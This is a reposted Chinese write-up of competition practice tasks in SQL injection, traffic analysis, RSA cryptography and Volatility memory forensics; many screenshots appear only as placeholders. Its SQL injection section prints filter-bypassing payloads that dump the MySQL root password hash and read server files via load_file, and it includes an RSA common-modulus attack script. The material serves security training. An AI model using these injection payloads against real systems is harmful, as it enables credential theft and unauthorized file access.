0


2024一带一路金砖国家企业信息安全赛项云启安全竞赛练习题

首页

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

一:SQL注入

2023年企业信息系统安全WriteUp解禁-SQL注入 - 知乎

一、任务简介

靶机系统:网站服务器

二、解答过程

任务一

获取数据库的版本, 提交格式:flag{****};

Payload: 1’//ununionion//seselectlect/**/1,version()#

任务二

获取数据库root账号密码, 将root用户40位加密hash作为flag进行提交 .提交格式:flag{*******};

Payload:1’//ununionion//selselectect//1,passwoorrd//frfromom//mysql.user//whewherere/**/user=‘root’#

任务三

获取数据库中存在的flag, 提交格式:flag{*******};

  1. 可能还要进行一次url编码
  2. Payload1:1'/**/ununionion/**/selselectect/**/1,table_name/**/frfromom/**/infoorrmatinfoorrmation_schemaion_schema.tables/**/WHWHEREERE/**/TABLE_SCHEMA=DATABASE()#
  3. Payload2:1'/**/ununionion/**/selselectect/**/1,column_name/**/frfromom/**/infoorrmatiinfoorrmation_schemaon_schema.columns/**/WHEWHERERE/**/table_name='flllllllag'#
  4. Payload3:1'/**/uniunionon/**/selselectect/**/1,fllaag/**/frfromom/**/flllllllag#

Payload1

Payload2

Payload3

任务四

获取服务器根目录存在的flag 提交格式:flag{*******};

  1. Payload:1'/**/uniunionon/**/selselectect/**/1,load_load_filefile("/flag")#

任务五

提交php7中加固sql注入的函数,提交格式:flag{X_X_X_X()};

php5是mysql_real_escape_string()

php7进行了更改mysqli_real_escape_string()

二:流量分析

题目一

在这里插入图片描述

在这里插入图片描述

题目二:

  1. ip.src == 101.64.102.111 and tcp.flags.syn == 3

在这里插入图片描述

题目三

在这里插入图片描述

在这里插入图片描述

第四题

在这里插入图片描述

在这里插入图片描述

第五题

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

第六题

在这里插入图片描述

在这里插入图片描述

三:CryptoYDYL

第一题:

在这里插入图片描述

在这里插入图片描述

第二题:

在这里插入图片描述

题目是一堆base

先解码出来是一堆的坐标

在这里插入图片描述

第三题

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

第四题

在这里插入图片描述

[BJDCTF 2020]rsa_output

给了一大串数据

很明显这是要用到共模攻击

共模是指:就是明文m,相同。用两个公钥e1,e2加密得到两个私钥d1,d2 和两个密文c1,c2
共模攻击:即当m不变的情况下,知道n,e1,e2,c1,c2, 可以在不知道d1,d2的情况下,解出m

参考链接:https://www.cnblogs.com/gwind/p/8013154.html

先了解一下拓展欧几里得

展欧几里得算法(简称扩欧)是欧几里得算法(又称辗转相除法)的扩展。扩欧可以在求得 a、b的最大公约数的同时,能找到整数 x、y,使它们满足贝祖等式:ax+by = gcd(a, b)

最终payload:

PYTHON

from Crypto.Util.number import *

import gmpy2

n = 21058339337354287847534107544613605305015441090508924094198816691219103399526800112802416383088995253908857460266726925615826895303377801614829364034624475195859997943146305588315939130777450485196290766249612340054354622516207681542973756257677388091926549655162490873849955783768663029138647079874278240867932127196686258800146911620730706734103611833179733264096475286491988063990431085380499075005629807702406676707841324660971173253100956362528346684752959937473852630145893796056675793646430793578265418255919376323796044588559726703858429311784705245069845938316802681575653653770883615525735690306674635167111

e1 = 2767

e2 = 3659

message1=20152490165522401747723193966902181151098731763998057421967155300933719378216342043730801302534978403741086887969040721959533190058342762057359432663717825826365444996915469039056428416166173920958243044831404924113442512617599426876141184212121677500371236937127571802891321706587610393639446868836987170301813018218408886968263882123084155607494076330256934285171370758586535415136162861138898728910585138378884530819857478609791126971308624318454905992919405355751492789110009313138417265126117273710813843923143381276204802515910527468883224274829962479636527422350190210717694762908096944600267033351813929448599

message2=11298697323140988812057735324285908480504721454145796535014418738959035245600679947297874517818928181509081545027056523790022598233918011261011973196386395689371526774785582326121959186195586069851592467637819366624044133661016373360885158956955263645614345881350494012328275215821306955212788282617812686548883151066866149060363482958708364726982908798340182288702101023393839781427386537230459436512613047311585875068008210818996941460156589314135010438362447522428206884944952639826677247819066812706835773107059567082822312300721049827013660418610265189288840247186598145741724084351633508492707755206886202876227

拓展欧几里得

s, s1, s2 = gmpy2.gcdext(e1, e2)

m = (pow(message1, s1, n) * pow(message2, s2, n)) % n

print(long_to_bytes(m))

在这里插入图片描述

第五题

在这里插入图片描述

简单的hex编码

四:内存取证YDYL

第五题:

在这里插入图片描述

7.该进程在运行过程中被注入的DLL文件是什么

./volatility_2.6_lin64_standalone -f CYBERDEF-567078-20230213-171333.raw profile=WinXPSP2x86 ldrmodules -p 880 | grep -i false

ldrmodules 是用于检测未链接 DLL 的插件命令

这里其实就是通过恶意的dll文件是未签名的来寻找,因为正常的dll动态链接库都是通过了签名校验的,但是恶意的dll文件是没有通过签名校验的,PChunter找病毒也是一样的原理

第六题

在这里插入图片描述

./volatility_2.6_lin64_standalone -f CYBERDEF-567078-20230213-171333.raw profile=WinXPSP2x86 malfind -p 880

malfind 是查找隐藏和注入代码的插件命令

malfind 是查找隐藏和注入代码的插件命令

我们可以把该dll文件导出到我们想要的目录里

./volatility_2.6_lin64_standalone -f CYBERDEF-567078-20230213-171333.raw profile=WinXPSP2x86 dlldump -p 880 --base=0x980000 --dump-dir=.

md5sum module.880.9aab590.980000.dll

第七题

在这里插入图片描述

6.该进程在运行过程中引用了一个奇怪的文件,文件完整路径是什么

./volatility_2.6_lin64_standalone -f CYBERDEF-567078-20230213-171333.raw profile=WinXPSP2x86 ldrmodules -p 880 | grep -i false

-p 是指定进程 ID 的选项

handles 是用于打印每个进程的打开句柄列表的插件命令

-t 是一个选项,用于指定您希望结果显示的对象类型。

此题依然考验对rootkit病毒的理解,通常情况下rootkit会释放两个文件,一个是sys驱动文件,一个是dll文件,rootkit自身只是一个释放程序,dll文件自身功能通常为通信木马,sys驱动程序为保活文件


本文转载自: https://blog.csdn.net/m0_64696290/article/details/139303797
版权归原作者 是乙太呀 所有, 如有侵权,请联系我们删除。

“2024一带一路金砖国家企业信息安全赛项云启安全竞赛练习题”的评论:

还没有评论